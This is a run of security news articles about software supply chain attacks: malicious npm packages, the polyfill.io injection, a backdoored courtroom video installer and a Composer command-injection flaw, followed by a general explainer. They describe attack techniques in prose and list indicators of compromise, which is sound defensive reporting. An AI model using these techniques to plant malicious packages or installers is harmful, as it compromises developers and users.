The cluster strongly aligns with Microsoft’s MOONSTONE SLEET, indicating a sophisticated supply chain attack vector.

The packages are initial access points for malware distribution, enabling data exfiltration, credential theft, and lateral movement within targeted environments. 

npm user nagasiren978 uploaded two malicious packages, “harthat-hash” and “harthat-api,”  on July 7th, 2024, which downloaded additional malware from a suspected North Korean C2 server. 

The server disseminates malicious batch scripts, and a DLL points to Windows systems as the intended target, which is consistent with MOONSTONE SLEET, a North Korean threat actor that Microsoft has identified. 

Two suspicious npm packages, harthat-hash and harthat-api, exhibit malicious behavior by employing a pre-install script to download a malicious DLL from a remote server, execute it using rundll32, and then self-destruct.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access

The packages are nearly identical except for a unique identifier in the download URL, suggesting a campaign targeting multiple victims with potentially varied payloads. 

A malicious npm package with the name harthat-api impersonates the legitimate package Hardhat by using names that are similar to those of the legitimate package.  

While the code originates from the well-known node-config repository, the malicious package modifies the package.json file to remove the preinstall script and change the name to config.

It also includes two additional files, deference.js and pk.json, whose purposes are not analyzed in this excerpt.  

The preinstall script maliciously downloads a DLL file disguised as a temporary file from a remote server, renames it to “package.db,” and executes it using the “rundll32” system utility. 

This technique, known as “System Binary Proxy Execution,” attempts to evade detection and then cleans up by deleting the downloaded DLL and restoring the original “package.json” file, masking its malicious activity. 

The Datadog Security Research team’s analysis of the malicious DLL revealed a seemingly benign binary with no apparent malicious functionality. It exported two functions, one of which, GenerateKeyW, is expected to contain malicious code. 

Static and dynamic analysis failed to uncover any self-modification or harmful behavior within the DLL.

The absence of malicious code suggests that the DLL is either an incomplete or testing version, indicating the threat actor is potentially experimenting with their infrastructure or making an operational error. 

In a recent attack, threat actors compromised targets via malicious npm packages, harthat-api-v1.3.1.zip, and harthat-hash-v1.3.3.zip, which likely contained copied content to appear legitimate. 

The malicious payloads were downloaded from IP address 142.111.77.196. Potential indicators of compromise (IOCs) include the filenames Temp.b (also known as package.db) and its SHA256 hash, d2a74db6b9c900ad29a81432af72eee8ed4e22bf61055e7e8f7a5f1a33778277.

How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide

The post North Korean Hackers Attacking Windows Users With Weaponized npm Files appeared first on Cyber Security News.

Polyfills ensure compatibility across a wide range of browsers, enabling developers to use modern JavaScript and web APIs by implementing what was missing.

In February, a Chinese firm purchased the “cdn.polyfill.io” site and the GitHub account for the popular polyfill.js library, which is used by more than 100K sites, including JSTOR, Intuit, and the World Economic Forum.

Since then, researchers at Sansec discovered that there have been complaints about the domain injecting malware targeted at mobile devices to GitHub pages that were quickly deleted.

Free Webinar on API vulnerability scanning for OWASP API Top 10 vulnerabilities -> Book Your Spot

Polyfill JS Library Injected

Sansec decoded one variant that redirects mobile users to a gambling website via a simulated Google Analytics domain characterized by anti-reverse engineering protections and selective activation.

The original creator now prevents using Polyfill, while Fastly and Cloudflare offer safe alternatives.

This event depicts a supply chain attack that underscores the importance of monitoring user-loaded third-party code.

Cybersecurity researchers assigned descriptive names to various code components during their investigation to improve understanding. 

However, they noted that one particular function, “tiaozhuan,” was not their creation but rather an original element. 

This Chinese term, interpreted as “jump” in English, was embedded by the threat actors, potentially providing a fine clue about the malware’s origin or its creators’ background.

IoCs

• https://kuurza[.]com/redirect?from=bitget
• https://www.googie-anaiytics[.]com/html/checkcachehw.js
• https://www.googie-anaiytics[.]com/ga.js

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free

The post Polyfill JS Library Injected Malware Into 100K+ Websites appeared first on Cyber Security News.

The installer for this version is backdoored, allowing attackers to remotely seize control of infected systems, which could grant access to sensitive data and potentially establish persistence on the network. 

To mitigate the risk, users should immediately re-image affected devices and reset all associated credentials.

After a clean system image is established, upgrading to JAVS Viewer v8.3.8 or later is recommended. 

An investigation into malicious fffmpeg.exe binary execution from C:\Program Files (x86)\JAVS\Viewer 8\ folder revealed a supply chain attack. 

The culprit was traced back to a compromised JAVS Viewer installer (JAVS Viewer Setup 8.3.7.250-1.exe) downloaded from the official JAVS website on March 5th.

ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

The installer was signed with an unexpected certificate and contained the malicious fffmpeg.exe. It executed encoded PowerShell scripts, dropping a GateDoor/Rustdoor family malware variant. 

It has been discovered that there is malicious activity within fffmpeg.exe, as this program connects to a command-and-control server using Windows sockets and WinHTTP requests, transmitting data like hostname, OS details, and username. 

After establishing a persistent connection, the program waits for commands from the C2 server.

Further investigation revealed the execution of obfuscated PowerShell scripts, suggesting additional malicious actions. 

Rapid7 analyzed two malicious executables, fffmpeg.exe and chrome_installer.exe. Ffmpeg.exe executes obfuscated PowerShell scripts that attempt to disable security measures and download additional malware. 

Chrome_installer.exe creates temporary files and attempts to execute a compiled Python script (main.exe) to steal browser credentials.

However, analysis suggests an issue in the source code may prevent main.exe from functioning properly.  

The malicious JAVS.Viewer8.Setup_8.3.7.250-1.exe installer revealed a suspicious fffmpeg.exe binary with a typographical error (“fff” instead of “ff”), along with the installer itself, which was signed by an unexpected certificate belonging to “Vanguard Tech Limited” (instead of the legitimate “Justice AV Solutions Inc.”). 

The investigation on VirusTotal identified another malicious installer variant and dropper with different hashes dating back to April 1, 2024.

Interestingly, a debug file (Dll2.dll) included in the first installer variant contained an uncleaned compilation path, suggesting a potential oversight by the attackers.  

Attackers compromised the official download page of JAVS, a legitimate software vendor, and replaced the legitimate JAVS Viewer installer with a malicious one signed with a fraudulent certificate. 

The malware dropper was disguised as a software update for popular applications (Chrome, Firefox, and OneDrive).

The attack campaign lasted several months, from February to May 2024, and the malicious software was eventually removed by the attackers themselves. 

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

The post Hackers Backdoored Courtroom Video Recording Software With System Hijacking Malware appeared first on Cyber Security News.

A supply chain attack targeting the PHP community might have been possible using this vulnerability if it had been exploited.

In PHP dependency managers, Composer uses Packagist as the default repository to store the dependencies. The purpose of this is to aggregate all the public PHP packages that can be installed by using Composer. 

Over 2 billion packages are downloaded using Composer every month, which is a significant number.

Various malicious dependencies could have been distributed through the newly discovered vulnerability, which could have led to the compromise of millions of servers if it had been abused effectively.

Critical Vulnerability

It is reported that the vulnerability has been tracked as CVE-2022-24828, and it’s a command injection vulnerability. Input that is interpreted by Composer as parameters may be controlled by an attacker through this flaw.

CVE-2022-24828 is also associated with CVE-2021-29472, which is another vulnerability reported for Composer, associated with command injection.

It is possible for an attacker to make use of this vulnerability to target Packagist(.)org and Private Packagist, as a result of their control over a Git or Mercurial repository.

Demonstration of CVE-2022-24828

Anyone with access to a repository controlled by Git or Mercurial may be able to exploit the composition tool via the branch names contained in a project’s composer.json file, which is explicitly listed by URL in the file.

Those who wish to take advantage of this vulnerability would need to create a Mercurial repository in which they could create a project for the exploit. Then, create a malicious ‘readme’ entry in composer.json and add a manifest to it. 

After creating the .sh payload, it should be used to perform the desired action, and then be imported to Packagist as a package.

Security Patch

It is recommended that you upgrade to the following versions of Composer if you are integrating it as a library and working with untrusted repositories.

• 1.10.26
• 2.2.120
• 2.3.5

The Packagist maintainers were notified on April 7 about this vulnerability and a immediate patch was published the day after that. It is important to point out that there have been no incidents of exploitation in the wild reported as well.

Cyber Attack with Zero Trust Networking – Download Free E-Book

The post PHP Supply Chain Attack – Critical Vulnerability in PHP Central Component appeared first on Cyber Security News.

This supply chain does everything to get the delivery of the material from the manufacture. It does everything where you can do the complete delivery until the end-user. Always targeting the weak point cyber-attack gets successful, and attackers mainly take the advantage of the third-party vendor’s trust.

Mostly the organization who are connected with the third-party vendor they get attack fast. Normally, supply chain attacks are always rising in relevance and the attacks are in high status, making the target hit. There are few weak links in the supply chain that are easy for cybercriminals to target, and organizations must be aware of it and do some security implementation.

The Supply chain is always allowed to target specifically where the number of the victim can grow quickly. But it becomes tough to detect the attack and rely on the trusted software widely distributed. One more critical thing is how much more you will find us the third-party vendor so much more risk will come, and it will automatically get pushed from one team to another team.

Supply Chain Attack Risks:

We are very much dependent on digitalization, and cybersecurity risk is increasing day by day. Many organizations are trying to safeguard valuable data within the wall or inside the organization. When it gets continued many risks come up, and here we are sharing those risk factors for the organization, those are below:

1. Financial risk: When the data gets leaked, financial effects starts throughout the network and Microsoft breach occurs. Many economic fallouts happens due to data leakage.
2. Reputational risk: Any supplier breach damages the parties’ reputation and these are very well known in the market. The organisation that is shortlisted and gets impacted by the breach and later on it goes to the reputational risk of any organisation.
3. Operational risk: The operational factor always gets affected by the breach, and the attacker will have access to the network with an undetermined amount of time. In supply chain risk, there are many vendors involve, and it has an impact on the client organization.
4. Social risk: In this digitalization, societal risk is not a correct security measure. Unfortunately, the digital journey breaks the social trust where the system gets to rely on. Trust is essential for the operation and continued growth.

When are you securing your Supply Chain Attack, what is all you need to consider?

Whenever you access the supply chain, your security practice has to get extended. You need to get soon access to your valuable thing and security should be put at the beginning to do the continuous monitoring and make sure the effectiveness.

1. You need to hold your suppliers with the high-security standard and there many organization who neglects. Those get forced to adopt the strict protocol which they need to carry out.
2. Need to create a culture of protection: When the matter comes to data protection from cyber threats, you get an alert for the first-line defense. The organization that are standing on the outskirts will get the first access. If we think about the suppliers, then they need to know to manage the thing properly. Whenever any ideation comes, you can easily connect or detect it. Your primary focus must be you need to get protection. When you make a new data connection, you need to take a few steps to protect the crown jewels as soon as they do the testing and feature the latest technology, you need to focus on the security protocol. You should not assume that the suppliers will fit into your security architecture without testing of the product, service, and configuration.

As per the nature of technology it needs to get regular updates, which evolve over time and will be effective. Your supplier must have the relationships, technology adaption, and knowledge of access, improving the risk assessment.

Supply Chain Attack Mitigation

You need to protect the supply chain, and for that, you need to rethink your security approach. There is no silver bullet when the matter comes to save guard your organization. For any business, practice, security has to play an integrated part in your business. There are few things which has to consider while securing the supply chain; those are below:

1. Supplier management: There are few security requirements which include contracts, assessment, monitor, execution, etc. Any audit supplier makes sure that it is continued adherence, and it must create a culture where suppliers get informed proactively. Things will go even more broad if they have any breach.
2. Asset management: You need to have a clear overview of your organization’s status, and suppliers must know what is happening and what role has to be played for the organization.
3. People awareness: Supply chain management completely depends on the suppliers and contractors. You need to apply the strict security standards for the individuals to which you have applied for the suppliers. Though the person is  familiar, you only need to grand them the access with proper clearance to revoke the credential and their contracts get terminated.
4. Monitoring and cyber threat intelligence: Through this, you can detect things when it goes wrong, and include tracked intelligence. When the matter comes for the key supplier, you need to monitor the risk based on the elements, and it gets discussed in the contractive phase. Cyber threat intelligence understands the risk espouser of the critical supplier very effectively and manage the risk.
5. Penetration testing: When technology got introduced, you need to think about the security and the tested design which got tested. There are different third parties that can offer this as a service. This is a high-impact organization with highly sensitive, data and it must acknowledge the responsibility they need to do.

Final Thoughts

You need to challenge your suppliers, and you need to arrange your security with their digital journey. In this era, the business environment is changing so many companies have increased the opportunity but even risk also increased. So you need to update your organization’s security function.

Recent Supply Chain Attacks

Supply-chain Attack – Codecov Breach Hundreds of Networks Reportedly Hacked

Researchers Hacked into Microsoft, Apple, more in Novel Supply Chain Attack

Kaseya’s IT Management Software Supply-Chain Attack Hits 40 Customers Worldwide With REvil Ransomware

The post What is a Supply Chain Attack? How Attackers Use that to Compromise Organization Security appeared first on Cyber Security News.